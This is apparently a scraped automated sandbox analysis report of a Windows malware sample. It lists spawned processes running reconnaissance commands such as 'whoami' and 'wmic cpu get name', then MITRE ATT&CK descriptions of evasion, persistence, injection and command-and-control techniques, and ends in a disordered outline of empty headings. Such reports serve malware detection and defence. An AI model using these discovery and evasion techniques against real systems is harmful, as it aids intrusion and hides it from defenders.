Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 2248 Parent PID: 6788

General

Start time:	19:12:33
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: whoami.exe PID: 5792 Parent PID: 7080

General

Start time:	19:12:33
Start date:	14/01/2022
Path:	C:\Windows\System32\whoami.exe
Wow64 process (32bit):	false
Commandline:	whoami
Imagebase:	0x7ff7aa4f0000
File size:	70144 bytes
MD5 hash:	AA18BE1AD24DE09417C1A7459F5C1701
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: whoami.exe PID: 6036 Parent PID: 6788

General

Start time:	19:12:33
Start date:	14/01/2022
Path:	C:\Windows\System32\whoami.exe
Wow64 process (32bit):	false
Commandline:	whoami
Imagebase:	0x7ff7aa4f0000
File size:	70144 bytes
MD5 hash:	AA18BE1AD24DE09417C1A7459F5C1701
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 3312 Parent PID: 5268

General

Start time:	19:12:34
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "wmic cpu get name"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 5756 Parent PID: 7120

General

Start time:	19:12:34
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "wmic cpu get name"
Imagebase:	0x7ff76d4d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 5568 Parent PID: 3312

General

Start time:	19:12:34
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 5388 Parent PID: 5756

General

Start time:	19:12:35
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Networking:

Spam, unwanted Advertisements and Ransom Demands:

DDoS:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

Behavior

System Behavior

Analysis Process: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe PID: 4356 Parent PID: 4764

General

Analysis Process: cmd.exe PID: 6516 Parent PID: 4356